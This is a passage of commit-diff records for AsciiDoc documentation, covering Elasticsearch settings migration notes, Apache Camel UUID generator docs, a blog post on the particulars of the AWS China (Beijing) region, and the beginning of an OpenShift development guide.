server.\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"3967261a9350d4fa0d488640b829f73c9a11f4a9","subject":"Add migration note for remote cluster settings (#33632)","message":"Add migration note for remote cluster settings (#33632)\n\nThe remote cluster settings search.remote.* have been renamed to\ncluster.remote.* and are automatically upgraded in the cluster state on\ngateway recovery, and on put. This commit adds a note to the migration\ndocs for these changes.\n","repos":"strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/migration\/migrate_6_0\/settings.asciidoc","new_file":"docs\/reference\/migration\/migrate_6_0\/settings.asciidoc","new_contents":"[[breaking_60_settings_changes]]\n=== Settings changes\n\n==== Remove support for elasticsearch.json and elasticsearch.yaml configuration file\n\nThe configuration file found in the Elasticsearch config directory could previously have\na `.yml`, `.yaml` or `.json` extension. Only `elasticsearch.yml` is now supported.\n\n==== Duplicate keys in configuration file\n\nIn previous versions of Elasticsearch, the configuration file was allowed to\ncontain duplicate keys. For example:\n\n[source,yaml]\n--------------------------------------------------\nnode:\n name: my-node\n\nnode\n attr:\n rack: my-rack\n--------------------------------------------------\n\nIn Elasticsearch 6.0.0, this is no longer permitted. Instead, this must be\nspecified in a single key as:\n\n[source,yaml]\n--------------------------------------------------\nnode:\n name: my-node\n attr:\n rack: my-rack\n--------------------------------------------------\n\n==== Coercion of boolean settings\n\nPreviously, Elasticsearch recognized the strings `true`, `false`, `on`, `off`, `yes`, `no`, `0`, `1` as booleans. Elasticsearch 6.0\nrecognizes only `true` and `false` as boolean and will throw an error otherwise. For backwards compatibility purposes, during the 6.x series\nindex settings on pre-6.0 indices will continue to work. Note that this does not apply to node-level settings that are stored\nin `elasticsearch.yml`.\n\n==== Snapshot settings\n\nThe internal setting `cluster.routing.allocation.snapshot.relocation_enabled` that allowed shards with running snapshots to be reallocated to\ndifferent nodes has been removed. Enabling this setting could cause allocation issues if a shard got allocated off a node and then\nreallocated back to this node while a snapshot was running.\n\n==== Store throttling settings\n\nStore throttling has been removed. As a consequence, the\n`indices.store.throttle.type` and `indices.store.throttle.max_bytes_per_sec`\ncluster settings and the `index.store.throttle.type` and\n`index.store.throttle.max_bytes_per_sec` index settings are not\nrecognized anymore.\n\n==== Store settings\n\nThe `default` `index.store.type` has been removed. If you were using it, we\nadvise that you simply remove it from your index settings and Elasticsearch\nwill use the best `store` implementation for your operating system.\n\n==== Network settings\n\nThe blocking TCP client, blocking TCP server, and blocking HTTP server have been removed.\nAs a consequence, the `network.tcp.blocking_server`, `network.tcp.blocking_client`,\n`network.tcp.blocking`,`transport.tcp.blocking_client`, `transport.tcp.blocking_server`,\nand `http.tcp.blocking_server` settings are not recognized anymore.\n\nThe previously unused settings `transport.netty.max_cumulation_buffer_capacity`,\n`transport.netty.max_composite_buffer_components` and\n`http.netty.max_cumulation_buffer_capacity` have been removed.\n\n==== Similarity settings\n\nThe `base` similarity is now ignored as coords and query normalization have\nbeen removed. If provided, this setting will be ignored and issue a\ndeprecation warning.\n\n==== Script Settings\n\nAll of the existing scripting security settings have been removed. Instead\nthey are replaced with `script.allowed_types` and `script.allowed_contexts`.\n\n==== Discovery Settings\n\nThe `discovery.type` settings no longer supports the values `gce`, `azure` and `ec2`.\nIntegration with these platforms should be done by setting the `discovery.zen.hosts_provider` setting to\none of those values.\n\n==== Cross-cluster search settings renamed\n\nThe cross-cluster search remote cluster connection infrastructure is also used\nin cross-cluster replication. This means that the setting names\n`search.remote.*` used for configuring cross-cluster search belie the fact that\nthey also apply to other situations where a connection to a remote cluster as\nused. Therefore, these settings have been renamed from `search.remote.*` to\n`cluster.remote.*`. For backwards compatibility purposes, we will fallback to\n`search.remote.*` if `cluster.remote.*` is not set. For any such settings stored\nin the cluster state, or set on dynamic settings updates, we will automatically\nupgrade the setting from `search.remote.*` to `cluster.remote.*`. The fallback\nsettings will be removed in 8.0.0.\n","old_contents":"[[breaking_60_settings_changes]]\n=== Settings changes\n\n==== Remove support for elasticsearch.json and elasticsearch.yaml configuration file\n\nThe configuration file found in the Elasticsearch config directory could previously have\na `.yml`, `.yaml` or `.json` extension. Only `elasticsearch.yml` is now supported.\n\n==== Duplicate keys in configuration file\n\nIn previous versions of Elasticsearch, the configuration file was allowed to\ncontain duplicate keys. For example:\n\n[source,yaml]\n--------------------------------------------------\nnode:\n name: my-node\n\nnode\n attr:\n rack: my-rack\n--------------------------------------------------\n\nIn Elasticsearch 6.0.0, this is no longer permitted. Instead, this must be\nspecified in a single key as:\n\n[source,yaml]\n--------------------------------------------------\nnode:\n name: my-node\n attr:\n rack: my-rack\n--------------------------------------------------\n\n==== Coercion of boolean settings\n\nPreviously, Elasticsearch recognized the strings `true`, `false`, `on`, `off`, `yes`, `no`, `0`, `1` as booleans. Elasticsearch 6.0\nrecognizes only `true` and `false` as boolean and will throw an error otherwise. For backwards compatibility purposes, during the 6.x series\nindex settings on pre-6.0 indices will continue to work. Note that this does not apply to node-level settings that are stored\nin `elasticsearch.yml`.\n\n==== Snapshot settings\n\nThe internal setting `cluster.routing.allocation.snapshot.relocation_enabled` that allowed shards with running snapshots to be reallocated to\ndifferent nodes has been removed. Enabling this setting could cause allocation issues if a shard got allocated off a node and then\nreallocated back to this node while a snapshot was running.\n\n==== Store throttling settings\n\nStore throttling has been removed. As a consequence, the\n`indices.store.throttle.type` and `indices.store.throttle.max_bytes_per_sec`\ncluster settings and the `index.store.throttle.type` and\n`index.store.throttle.max_bytes_per_sec` index settings are not\nrecognized anymore.\n\n==== Store settings\n\nThe `default` `index.store.type` has been removed. If you were using it, we\nadvise that you simply remove it from your index settings and Elasticsearch\nwill use the best `store` implementation for your operating system.\n\n==== Network settings\n\nThe blocking TCP client, blocking TCP server, and blocking HTTP server have been removed.\nAs a consequence, the `network.tcp.blocking_server`, `network.tcp.blocking_client`,\n`network.tcp.blocking`,`transport.tcp.blocking_client`, `transport.tcp.blocking_server`,\nand `http.tcp.blocking_server` settings are not recognized anymore.\n\nThe previously unused settings `transport.netty.max_cumulation_buffer_capacity`,\n`transport.netty.max_composite_buffer_components` and\n`http.netty.max_cumulation_buffer_capacity` have been removed.\n\n==== Similarity settings\n\nThe `base` similarity is now ignored as coords and query normalization have\nbeen removed. If provided, this setting will be ignored and issue a\ndeprecation warning.\n\n==== Script Settings\n\nAll of the existing scripting security settings have been removed. Instead\nthey are replaced with `script.allowed_types` and `script.allowed_contexts`.\n\n==== Discovery Settings\n\nThe `discovery.type` settings no longer supports the values `gce`, `azure` and `ec2`.\nIntegration with these platforms should be done by setting the `discovery.zen.hosts_provider` setting to\none of those values.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fede74db67a12f6b771878100a4470989b5cf98e","subject":"add missing documentation about SimpleUuidGenerator","message":"add missing documentation about SimpleUuidGenerator\n","repos":"tdiesler\/camel,apache\/camel,tadayosi\/camel,mcollovati\/camel,nikhilvibhav\/camel,adessaigne\/camel,nicolaferraro\/camel,cunningt\/camel,apache\/camel,alvinkwekel\/camel,apache\/camel,tadayosi\/camel,pax95\/camel,christophd\/camel,tdiesler\/camel,pmoerenhout\/camel,apache\/camel,pax95\/camel,tdiesler\/camel,gnodet\/camel,pmoerenhout\/camel,pax95\/camel,adessaigne\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,tdiesler\/camel,christophd\/camel,pax95\/camel,alvinkwekel\/camel,tdiesler\/camel,apache\/camel,christophd\/camel,christophd\/camel,apache\/camel,adessaigne\/camel,mcollovati\/camel,alvinkwekel\/camel,gnodet\/camel,gnodet\/camel,nicolaferraro\/camel,tadayosi\/camel,pmoerenhout\/camel,christophd\/camel,adessaigne\/camel,gnodet\/camel,christophd\/camel,cunningt\/camel,pax95\/camel,gnodet\/camel,nicolaferraro\/camel,cunningt\/camel,tadayosi\/camel,cunningt\/camel,nicolaferraro\/camel,cunningt\/camel,cunningt\/camel,adessaigne\/camel,mcollovati\/camel,tdiesler\/camel,mcollovati\/camel,pax95\/camel,tadayosi\/camel,tadayosi\/camel,alvinkwekel\/camel,adessaigne\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/uuidgenerator.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/uuidgenerator.adoc","new_contents":"[[UuidGenerator-UuidGenerator]]\n= UuidGenerator\n\nStarting with *Camel 2.5*, Camel supports 3rd party UUID generator(s).\nThis is useful, if e.g. your messaging provider does not support UUID's\nwith a length of 36 characters (like Websphere MQ). Another useful\nscenario is to use a simple counter for testing purpose. With this it is\neasier to correlate the exchanges in the log\/debugger.\n\nCamel uses UUIDs in the exchange and message ids, and other unique ids\nit uses.\n\nYou only have to implement `org.apache.camel.spi.UuidGenerator` and tell\nCamel, that it should use your custom implementation:\n\n[[UuidGenerator-ConfiguringfromJavaDSL]]\n== Configuring from Java DSL\n\n[source,java]\n----\ngetContext().setUuidGenerator(new MyCustomUuidGenerator());\n----\n\nWarning: You should not change the UUID generator at runtime (it should only be\nset once)!\n\n[[UuidGenerator-ConfiguringfromSpringDSL]]\n== Configuring from XML DSL\n\nCamel will configure this UUID generator by doing a lookup in the Spring\nbean registry to find the bean of the type\n`org.apache.camel.spi.UuidGenerator`.\n\n[source,xml]\n----\n<bean id=\"simpleUuid\" class=\"org.apache.camel.support.SimpleUuidGenerator\" \/>\n\n<camelContext id=\"camel\" xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:start\" \/>\n <to uri=\"mock:result\" \/>\n <\/route>\n<\/camelContext>\n----\n\n[[UuidGenerator-Providedimplementations]]\n== Provided implementations\n\nCamel comes with three implementations of\n`org.apache.camel.spi.UuidGenerator`:\n\n* `org.apache.camel.support.SimpleUuidGenerator` - This implementation uses\ninternally a `java.util.concurrent.atomic.AtomicLong` and increases the\nID for every call by one. Starting with 1 as the first id.\n* `org.apache.camel.support.VanillaUuidGenerator` - This implementation uses\na random generated seed and a counter which increments by one. This generator\nis not unique per host or JVM.\n* `org.apache.camel.impl.engine.DefaultUuidGenerator` - This implementation\nuses a fast unique UUID generation that is cluster safe (similar to uuid\ngenerator in ActiveMQ). This is the default implementation in use by Camel.\n","old_contents":"[[UuidGenerator-UuidGenerator]]\n= UuidGenerator\n\nStarting with *Camel 2.5*, Camel supports 3rd party UUID generator(s).\nThis is useful, if e.g. your messaging provider does not support UUID's\nwith a length of 36 characters (like Websphere MQ). Another useful\nscenario is to use a simple counter for testing purpose. With this it is\neasier to correlate the exchanges in the log\/debugger.\n\nCamel uses UUIDs in the exchange and message ids, and other unique ids\nit uses.\n\nYou only have to implement `org.apache.camel.spi.UuidGenerator` and tell\nCamel, that it should use your custom implementation:\n\n[[UuidGenerator-ConfiguringfromJavaDSL]]\n== Configuring from Java DSL\n\n[source,java]\n----\ngetContext().setUuidGenerator(new MyCustomUuidGenerator());\n----\n\nWarning: You should not change the UUID generator at runtime (it should only be\nset once)!\n\n[[UuidGenerator-ConfiguringfromSpringDSL]]\n== Configuring from XML DSL\n\nCamel will configure this UUID generator by doing a lookup in the Spring\nbean registry to find the bean of the type\n`org.apache.camel.spi.UuidGenerator`.\n\n[source,xml]\n----\n<bean id=\"simpleUuid\" class=\"org.apache.camel.support.SimpleUuidGenerator\" \/>\n\n<camelContext id=\"camel\" xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:start\" \/>\n <to uri=\"mock:result\" \/>\n <\/route>\n<\/camelContext>\n----\n\n[[UuidGenerator-Providedimplementations]]\n== Provided implementations\n\nCamel comes with two implementations of\n`org.apache.camel.spi.UuidGenerator`:\n\n* `org.apache.camel.support.SimpleUuidGenerator` - This implementation use\ninternally a `java.util.concurrent.atomic.AtomicLong` and increase the\nID for every call by one. Starting with 1 as the first id.\n* `org.apache.camel.impl.engine.DefaultUuidGenerator` - This implementation\nuse a fast unique UUID generation that is cluster safe (similar to uuid generator in ActiveMQ)\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e98d0054d7c94b2fdfeb9b5a5d86370a4378645f","subject":"small wording changes","message":"small wording changes\n","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-8-20-AWS-China.adoc","new_file":"_posts\/2015-8-20-AWS-China.adoc","new_contents":"= AWS China(Beijing) Region Tips\nKeito Fukuda <keito.fukuda@fastretailing.com>\n:toc:\n\nHi, there, my name is Keito Fukuda, a lead technical architect at Fast Retailing.\nToday I would like to talk about AWS China(Beijing) region since it is very unique from other AWS regions and you may want to know the discrepancies in advance of you starting to use it without making some efforts to figure it out on your own.\n\n== Fast Retailing\nLet me start with a little bit talking about our company Fast Retailing as there are some chances that you hear very first time and have no idea about us.\nWe Fast Retailing is one of global leading apparel companies and a holding company which owns various global apparel brands underneath such as UNIQLO, GU, they are born in Japan but spreading out to global markets. Theory, JBrand, they are originally from US but both have global penetration and large number of funs all over the world. Last but not least, Comptoir des Cotonniers and Princesse tam tam, which are from France.\nAs we have global reachability, of course we aggressively take advantage of AWS and its global regions for our systems. We as of today utilize Tokyo, Singapore, Virginia, California, Sydney, Ireland, Frankfrut, then of course China(Beijing) regions to provide our services to our global customers as well as systems to our global employees. Especially China(Beijing) region is pretty important for us as it is our 2nd biggest market, besides there are some challenges due to some unique legal and infrastructure restrictions.\n\n== Web Service to China\nAs described above, when we provide a web service in mainland China, there are some difficulties. I will quickly list up 2 significant challenges below and talk about them one by one in the following section.\n\n. ICP Recordal\/License\n. Great Firewall\n\n=== ICP Recordal\/License\nAs you all may know, if you provide a web service in mainland China, it is necessary to acquire an ICP(Internet Content Provider) recordal or license from the China government. This recordal\/license requires us to have a legal entity inside of China and go though required procedure. In addition, once you acquired it, you are supposed to put it at the bottom of all of your web pages.\nWe Fast Retailing do hold several ICP recordals for our brands to provide web contents in mainland China as you can see below.\n\n[format=\"csv\", options=\"header\"]\n.Fast Retailing ICP Recordal List\n|===\nDomain, Recordal No.\nuniqlo.com, \u6caaICP\u590709003223\u53f7-4\nuniqlo.cn, \u6caaICP\u590709003223\u53f7-1\ngu-global.com, \u6caaICP\u590713017798\u53f7-1\nfastretailing.com, \u6caaICP\u590709003223\u53f7-3\n|===\n\nimage::http:\/\/fastretailing.github.io\/blog\/images\/china_icp_footer.png\n\n=== Great Firewall\nThis is another very well-known unique restriction in mainland China. You can find what it is and how it works in somewhere online(Please just google it or just jump to https:\/\/en.wikipedia.org\/wiki\/Great_Firewall[wikipedia]). But in a nutshell, all inbound\/outbound traffics on HTTP(80)\/HTTPs(443) are monitored and can be blocked at DNS level by China government.\nEspecially when traffic goes out of mainland China, it is monitored and makes traffic roundtrip extremely slow.\nEven network traffic completes inside of China, it is still unstable especially if traffic goes beyond a boundary between North side dominated by China telecom and South side dominated by China Unicom. Because of these reasons, when you provide web contents from somewhere outside of mainland China, you need to pay attention on huge network latency in your system architecture design. This is the biggest reason which would make you want to have a completely independent infrastructure inside of mainland China to overcome network latency issue and be able to provide sufficient user experience to your China customers or employees.\n\n= AWS China(Beijing) Region Uniqueness\nOkay, then let me deep dive on what are the differences exactly from here. Because of the China unique restrictions described in the prior section, when you set up your web service in AWS China(Beijing) region, there are several consideration points you need to keep in mind. Here I will tell you each one of them which we have discovered so far through our operation in China(Beijing) region.\n\n== Account\nFirst of all, let me talk about AWS account. This is one of things which work in different way from all other AWS regions. In order to use China region, you need a completely independent account, which is dedicated only for China region and given only when you are authorized by AWS. Unlike global AWS account, you cannot create your account on the fly by yourself. You first need to submit your information https:\/\/www.amazonaws.cn\/en\/sign-up\/[here], then have to wait to get it verified and authorized.\n\n== Billing\nEven if you have multi accounts, one of great features for billing which you can use in Global account is `Consolidated Billing`, which allows you to consolidate all billings associated with all your accounts and let you make a single payment at once. However unfortunately this does not cover AWS China account. Once you get a China account, you need to register your billing information separately from your Global account and it cannot be consolidated.\n\n== Support Plan\nSimilar to billing, as we cannot consolidate our China account with any other Global accounts, even if you already subscribe https:\/\/aws.amazon.com\/premiumsupport\/[AWS support plan], that support can not be applied and cover your China account. If you need intensive support from AWS, you have to subscribe https:\/\/www.amazonaws.cn\/en\/support-plans\/[another support plan] dedicated only for your China account.\n\n== Service Availability\nWhen it comes to AWS service coverage and availability. As of writing, 2015\/08\/20, there are plenty of services we can already use as listed below.\nEC2, S3, StorageGateway, Glacier, VPC, Direct Connect, IAM, Trusted Advisor, CloudTrail, CloudWatch, DynamoDB, ElasticCache, RDS, CloudFormation, EMR, Kinesis, SNS, SQS, SWF\nimage::http:\/\/fastretailing.github.io\/blog\/images\/china_service_list.png\nWe are really looking forward to Lambda support and API Gateway as we will be heavily relying on these 2 services down the road. I hope they will become available even in China region soon.\nAnother AWS service which everybody needs but is not available yet is `CloudFront`. As I said, even if you have your system up and running in mainland China, there would be still some network instability you and your system users might face. This would make you want to have CDN(Contents Delivery Network) between your users and your system inside of China. As `CloudFront` is not ready yet in China region, we Fast Retailing utilize both `Akamai` and `China Cache` as CDN in front of our systems.\nFor more details and the latest information, please refer to http:\/\/docs.amazonaws.cn\/en_us\/aws\/latest\/userguide\/services.html[the official online document] maintained by AWS.\n\n== ICP Recordal\/License\nAs mentioned above, it is a regulation to acquire an ICP recordal\/license whenever you provide web contents over HTTP(80)\/HTTPs(443) in mainland China. This is the reason that even after you set up your web service on top of EC2, S3 or whatever, you still cannot access to your web service from the Internet. Very first time when we found that HTTP\/HTTPs GET cannot be completed even after our system is completely ready, we really freaked out and had no idea what was happening...(yes, we should have read through all instructions upfront). You would get 403(Forbidden) response without your ICP license No. associated on your China account. In order to get this done, you can either reach out to your AWS counterpart to get a help on this or directly send an email to `Sinnet`, who is an IDC-licensed provider responsible for supporting and verifying ICP recordal\/license for AWS customers, at `My Account` on your own to have them register it. This registration process and getting your ICP recordal\/license verified would take around a week(in our case, 5 business days). Then you would finally get your web service all ready.\nimage::http:\/\/fastretailing.github.io\/blog\/images\/china_icp_license.png\n\n== MFA\nOf course, protecting your account is one of very important thing you are also responsible for. In our case, we have a strict internal regulation to enable MFA(Multi Factor Authentication) to all AWS administrative accounts. In other word, we have been simply counting on MFA for all of our Global accounts. However, unfortunately MFA is not available yet in China account, which was actually huge surprise for us. We cannot simply rely on it like all other accounts to make your account secure. I guess only one thing we can do for now then is to make your administrative account password as complex as possible, and that is what we do as of today. We are now pushing AWS team really hard to get it ready. Let's wait without losing the hope.\n\n== AMI\nDo you share and reuse your AMI across accounts or regions? Unfortunately that is another restriction in China account. We Fast Retailing also heavily rely on AMI to make infra set-up as fast and efficient as possible. AMI is just awesome. Having said that, we are not allowed to copy an AMI taken in other global regions or your other accounts. So basically you need to set up your system from middleware setup to deploying your app codes all on your own at very first time. Once you set it up, you can take an AMI out of it and use it to spin up another instance you need.\nIn addition, as you can easily imagine, yes, you cannot take advantage of AWS Marketplace either. This would sometimes make huge implication to your setup operation.\nAs for Community AMI, there are some Community AMIs already available even in China region, but they are completely separated from Community AMIs under Global accounts. You would find only very limited AMIs there. So it is recommended to check availability of an Community AMI you would like to use in China account first.\n\n== Auto-Recovery\nWe do generally set Auto-Recovery on EC2 instances, especially when our EC2 based system cannot be run together with multi-instances and it is really difficult to have high-availability. Auto-Recovery brings us huge help in minimizing down-time of your system without any manual operation on the fly in case your instance somehow goes down. However unfortunately, Auto-Recovery is not ready yet in China region.\n\n== Admin Console\nI hope you do not have any problem in reading English, then you are totally fine. However unlike Global accounts which support multi-languages in admin console. Admin console of China account is only in English and Simplified Chinese as of today. You can change the language in `Console Preferences`. This is another difference from Global account.\nimage::http:\/\/fastretailing.github.io\/blog\/images\/china_admin_console.png\n\n== Conclusion\nToday, I touched on AWS China(Beijing) region and described all uniquenesses you should be aware of prior you start using it. As you saw above, there are many differences compared to all other global regions which you usually use. Some differences may be filled in the future, but there are still some differences even AWS cannot do anything on due to China legal regulation. I hope you were able to at least get a sense of idea how different it is and what you need to keep in mind.\n","old_contents":"= AWS China(Beijing) Region Tips\nKeito Fukuda <keito.fukuda@fastretailing.com>\n:toc:\n\nHi, there, my name is Keito Fukuda, a lead technical architect at Fast Retailing.\nToday I would like to talk about AWS China(Beijing) region since it is very unique from other AWS regions and you may want to know the discrepancies in advance of you starting to use it without making some efforts to figure it out on your own.\n\n== Fast Retailing\nLet me start with a little bit talking about our company Fast Retailing as there are some chances that you hear very first time and have no idea about us.\nWe Fast Retailing is one of global leading apparel companies and a holding company which owns various global apparel brands underneath such as UNIQLO, GU, they are born in Japan but spreading out to global markets. Theory, JBrand, they are originally from US but both have global penetration and large number of funs all over the world. Last but not least, Comptoir des Cotonniers and Princesse tam tam, which are from France.\nAs we have global reachability, of course we aggressively take advantage of AWS and its global regions for our systems. We as of today utilize Tokyo, Singapore, Virginia, California, Sydney, Ireland, Frankfrut, then of course China(Beijing) regions to provide our services to our global customers as well as systems to our global employees. Especially China(Beijing) region is pretty important for us as it is our 2nd biggest market, besides there are some challenges due to some unique legal and infrastructure restrictions.\n\n== Web Service to China\nAs described above, when we provide a web service in mainland China, there are some difficulties. I will quickly list up 2 significant challenges below and talk about them one by one in the following section.\n\n. ICP Recordal\/License\n. Great Firewall\n\n=== ICP Recordal\/License\nAs you all may know, if you provide a web service in mainland China, it is necessary to acquire an ICP(Internet Content Provider) recordal or license from the China government. This recordal\/license requires us to have a legal entity inside of China and go though required procedure. In addition, once you acquired it, you are supposed to put it at the bottom of all of your web pages.\nWe Fast Retailing do hold several ICP recordals for our brands to provide web contents in mainland China as you can see below.\n\n[format=\"csv\", options=\"header\"]\n.Fast Retailing ICP Recordal List\n|===\nDomain, Recordal No.\nuniqlo.com, \u6caaICP\u590709003223\u53f7-4\nuniqlo.cn, \u6caaICP\u590709003223\u53f7-1\ngu-global.com, \u6caaICP\u590713017798\u53f7-1\nfastretailing.com, \u6caaICP\u590709003223\u53f7-3\n|===\n\nimage::http:\/\/fastretailing.github.io\/blog\/images\/china_icp_footer.png\n\n=== Great Firewall\nThis is another very well-known unique restriction in mainland China. You can find what it is and how it works in somewhere online(Please just google it or just jump to https:\/\/en.wikipedia.org\/wiki\/Great_Firewall[wikipedia]). But in a nutshell, all inbound\/outbound traffics on HTTP(80)\/HTTPs(443) are monitored and can be blocked at DNS level by China government.\nEspecially when traffic goes out of mainland China, it is monitored and makes traffic roundtrip extremely slow.\nEven network traffic completes inside of China, it is still unstable especially if traffic goes beyond a boundary between North side dominated by China telecom and South side dominated by China Unicom. Because of these reasons, when you provide web contents from somewhere outside of mainland China, you need to pay attention on huge network latency in your system architecture design. This is the biggest reason which would make you want to have a completely independent infrastructure inside of mainland China to overcome network latency issue and be able to provide sufficient user experience to your China customers or employees.\n\n= AWS China(Beijing) Region Uniqueness\nOkay, then let me deep dive on what are the differences exactly from here. Because of the China unique restrictions described in the prior section, when you set up your web service in AWS China(Beijing) region, there are several consideration points you need to keep in mind. Here I will tell you each one of them which we have discovered so far through our operation in China(Beijing) region.\n\n== Account\nFirst of all, let me talk about AWS account. This is one of things which work in different way from all other AWS regions. In order to use China region, you need a completely independent account, which is dedicated only for China region and given only when you are authorized by AWS. Unlike global AWS account, you cannot create your account on the fly by yourself. You first need to submit your information https:\/\/www.amazonaws.cn\/en\/sign-up\/[here], then have to wait to get it verified and authorized.\n\n== Billing\nEven if you have multi accounts, one of great features for billing which you can use in Global account is `Consolidated Billing`, which allows you to consolidate all billings associated with all your accounts and let you make a single payment at once. However unfortunately this does not cover AWS China account. Once you get a China account, you need to register your billing information separately from your Global account and it cannot be consolidated.\n\n== Support Plan\nSimilar to billing, as we cannot consolidate our China account with any other Global accounts, even if you already subscribe https:\/\/aws.amazon.com\/premiumsupport\/[AWS support plan], that support can not be applied and cover your China account. If you need intensive support from AWS, you have to subscribe https:\/\/www.amazonaws.cn\/en\/support-plans\/[another support plan] dedicated only for your China account.\n\n== Service Availability\nWhen it comes to AWS service coverage and availability. As of writing, 2015\/08\/20, there are plenty of services we can already use as listed below.\nEC2, S3, StorageGateway, Glacier, VPC, Direct Connect, IAM, Trusted Advisor, CloudTrail, CloudWatch, DynamoDB, ElasticCache, RDS, CloudFormation, EMR, Kinesis, SNS, SQS, SWF\nimage::http:\/\/fastretailing.github.io\/blog\/images\/china_service_list.png\nWe are really looking forward to Lambda support and API Gateway as we will be heavily relying on these 2 services down the road. I hope they will become available even in China region soon.\nAnother AWS service which everybody needs but is not available yet is `CloudFront`. As I said, even if you have your system up and running in mainland China, there would be still some network instability you and your system users might face. This would make you want to have CDN(Contents Delivery Network) between your users and your system inside of China. As `CloudFront` is not ready yet in China region, we Fast Retailing utilize both `Akamai` and `China Cache` as CDN in front of our systems.\nFor more details and the latest information, please refer to http:\/\/docs.amazonaws.cn\/en_us\/aws\/latest\/userguide\/services.html[the official online document] maintained by AWS.\n\n== ICP Recordal\/License\nAs mentioned above, it is a regulation to acquire an ICP recordal\/license whenever you provide web contents over HTTP(80)\/HTTPs(443) in mainland China. This is the reason that even after you set up your web service on top of EC2, S3 or whatever, you still cannot access to your web service from the Internet. Very first time when we found that HTTP\/HTTPs GET cannot be completed even after our system is completely ready, we really freaked out and had no idea what was happening...(yes, we should have read through all instructions upfront). You would get 403(Forbidden) response without your ICP license No. associated on your China account. In order to get this done, you can either reach out to your AWS counterpart to get a help on this or send an email to `Sinnet`, who is an IDC-licensed provider responsible for supporting and verifying ICP recordal\/license for AWS customers, to have them register it on account setting page on your own. This registration process and getting your ICP recordal\/license verified would take around a week(in our case, 5 business days). Then you would finally get your web service all ready.\nimage::http:\/\/fastretailing.github.io\/blog\/images\/china_icp_license.png\n\n== MFA\nOf course, protecting your account is one of very important thing you are also responsible for. In our case, we have a strict internal regulation to enable MFA(Multi Factor Authentication) to all AWS administrative accounts. In other word, we have been simply counting on MFA for all of our Global accounts. However, unfortunately MFA is not available yet in China account, which was actually huge surprise for us. We cannot simply rely on it like all other accounts to make your account secure. I guess only one thing we can do for now then is to make your administrative account password as complex as possible, and that is what we do as of today. We are now pushing AWS team really hard to get it ready. Let's wait without losing the hope.\n\n== AMI\nDo you share and reuse your AMI across accounts or regions? Unfortunately that is another restriction in China account. We Fast Retailing also heavily rely on AMI to make infra set-up as fast and efficient as possible. AMI is just awesome. Having said that, we are not allowed to copy an AMI taken in other global regions or your other accounts. So basically you need to set up your system from middleware setup to deploying your app codes all on your own at very first time. Once you set it up, you can take an AMI out of it and use it to spin up another instance you need.\nIn addition, as you can easily imagine, yes, you cannot take advantage of AWS Marketplace either. This would sometimes make huge implication to your setup operation.\nAs for Community AMI, there are some Community AMIs already available even in China region, but they are completely separated from Community AMIs under Global accounts. You would find only very limited AMIs there. So it is recommended to check availability of an Community AMI you would like to use in China account first.\n\n== Auto-Recovery\nWe do generally set Auto-Recovery on EC2 instances, especially when our EC2 based system cannot be run together with multi-instances and it is really difficult to have high-availability. Auto-Recovery brings us huge help in minimizing down-time of your system without any manual operation on the fly in case your instance somehow goes down. However unfortunately, Auto-Recovery is not ready yet in China region.\n\n== Admin Console\nI hope you do not have any problem in reading English, then you are totally fine. However unlike Global accounts which support multi-languages in admin console. Admin console of China account is only in English as of today. This is another difference from Global account.\nimage::http:\/\/fastretailing.github.io\/blog\/images\/china_admin_console.png\n\n== Conclusion\nToday, I touched on AWS China(Beijing) region and described all uniquenesses you should be aware of prior you start using it. As you saw above, there are many differences compared to all other global regions which you usually use. Some differences may be filled in the future, but there are still some differences even AWS cannot do anything on due to China legal regulation. I hope you were able to at least get a sense of idea how different it is and what you need to keep in mind.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"dce6f2ca83be4b8d04761ba889adfbfd42c2ede6","subject":"Issue-30558: Grammatical change","message":"Issue-30558: Grammatical change\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"architecture\/understanding-development.adoc","new_file":"architecture\/understanding-development.adoc","new_contents":"[id=\"understanding-development\"]\n= Understanding {product-title} development\ninclude::modules\/common-attributes.adoc[]\n:context: understanding-development\ntoc::[]\n\nTo fully leverage the capability of containers when developing and running\nenterprise-quality applications, ensure your environment is supported by tools\nthat allow containers to be:\n\n* Created as discrete microservices that can be connected to other\ncontainerized, and non-containerized, services. For example, you might want to\njoin your application with a database or attach a monitoring application to it.\n\n* Resilient, so if a server crashes or needs to go down for maintenance or to be\ndecommissioned, containers can start on another machine.\n\n* Automated to pick up code changes automatically and then start and deploy new\nversions of themselves.\n\n* Scaled up, or replicated, to have more instances serving clients as demand\nincreases and then spun down to fewer instances as demand declines.\n\n* Run in different ways, depending on the type of application. For example, one\napplication might run once a month to produce a report and then exit. Another\napplication might need to run constantly and be highly available to clients.\n\n* Managed so you can watch the state of your application and react when\nsomething goes wrong.\n\nContainers\u2019 widespread acceptance, and the resulting requirements for tools and\nmethods to make them enterprise-ready, resulted in many options for them.\n\nThe rest of this section explains options for\nassets you can create when you build and deploy containerized Kubernetes\napplications in {product-title}. It also describes which approaches you might\nuse for different kinds of applications and development requirements.\n\n[id=\"developing-containerized-applications\"]\n== About developing containerized applications\n\nYou can approach application development with containers in many ways, and\ndifferent approaches might be more appropriate for different situations. To\nillustrate some of this variety, the series of approaches that is presented\nstarts with developing a single container and ultimately deploys that container\nas a mission-critical application for a large enterprise. These approaches\nshow different tools, formats, and methods that you can employ with containerized\napplication development. This topic describes:\n\n* Building a simple container and storing it in a registry\n* Creating a Kubernetes manifest and saving it to a Git repository\n* Making an Operator to share your application with others\n\n[id=\"building-simple-container\"]\n== Building a simple container\n\nYou have an 